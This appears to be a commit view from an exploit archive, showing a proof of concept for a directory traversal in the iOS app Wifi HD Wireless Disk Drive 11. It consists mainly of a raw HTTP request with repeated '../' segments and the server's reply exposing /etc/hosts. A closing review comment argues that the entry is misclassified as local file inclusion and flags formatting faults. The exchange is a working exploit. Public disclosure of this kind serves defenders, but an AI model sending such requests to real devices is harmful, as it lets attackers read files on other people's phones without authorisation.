
2 changes to exploits/shellcodes

Wifi HD Wireless Disk Drive 11 - Local File Inclusion
WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
39 lines
No EOL
1.1 KiB
Text
# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
# Version: 11
# Tested on: iPhone OS 15_5

# Proof of Concept
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate


-----------------

HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT

##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost
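
Review bot: The `# Exploit Title` line labels this a Local File Inclusion, but the recorded exchange shows a path traversal file read: the `GET` request with repeated `../` segments ending in `/etc/hosts` is answered with `Content-Disposition: attachment` and `Content-Type: application/download` carrying the hosts file, and nothing in the response indicates the server included or executed the file. Retitle the entry as directory traversal / arbitrary file read so it is triaged and matched to mitigations under the right class. Two details in the transcript also need cleaning up: the `User-Agent` value is wrapped onto a second line (`AppleWebKit/605.1.15 (KHTML, like Gecko) ...`), which is not a valid header line as written, and `Host: 192.168.1.100` disagrees with `Referer: http://192.168.1.103/`, so it is unclear which address was the device under test. The file view also reports "No EOL"; end the file with a newline.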